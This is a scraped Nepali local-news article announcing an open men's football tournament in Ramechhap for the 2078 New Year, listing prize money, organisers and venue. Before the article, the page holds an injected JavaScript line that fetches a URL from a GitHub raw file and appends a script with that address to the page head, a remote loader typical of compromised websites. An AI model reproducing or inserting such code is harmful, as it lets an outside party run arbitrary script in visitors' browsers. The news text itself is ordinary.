;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
चैत १९,
रामेछाप । रामेछापको उमाकुण्ड गाउँपालिका वडा नं २ बाम्तिभण्डारमा खुल्ला पुरुष फुटबल प्रतियोगिता हुने भएको छ । नयाँ वर्ष २०७८ सालको उपलक्ष्यमा सिर्जनलशील स्टार युवा कल्बको आयोजना र वडा कार्यालयको आर्थिक सहयोगमा फुटबल खेल आयोजना गरिएको हो । बातमती प्रदेशका आर्थिक मामिला तथा योजना मन्त्री कैलाश ढुङ्लेलले उद्धघाटन गर्ने सो खेल यही चैत्र २७ गतेदेखि सुरु हुने छ । खेल नयाँ वर्ष ०७८ को बैशाख १ गते समापन हुने छ ।
फुटबल खेलमा प्रथम हुनेले ७१ हजार १ सय ७१ रुपैयाँको साथमा सिल्ड, मेडल, र प्रमाणपत्र प्राप्त गर्ने छन् । त्यस्तै द्वितिय हुने टिमले ५१ हजार १ सय ७१ रुपैयाँको साथमा सिल्ड, मेडल, र प्रमाणपत्र प्राप्त गर्ने छन् ।
त्यस्तै तृतिय हुने टिमले ३१ हजार १ सय ३१ रुपैयाँको साथमा सिल्ड, मेडल, र प्रमाणपत्र प्राप्त गर्ने छन् ।
खेलमा सान्त्वना हुने टिमलाई पनि पुरस्कारको ब्यवस्था गरिएको छ । सान्त्वना हुनेलाई २१ हजार १ सय २१ रुपैयाँको साथमा सिल्ड, मेडल, र प्रमाण पत्र प्राप्त गर्ने छन् । खेल बाम्तिभण्डार लुबुस्थित सिद्धेश्वार उच्च माद्यामिक, बिद्यालयको खेल मैदानमा खेलाईने छ ।
फेसबुक प्रतिक्रियाहरु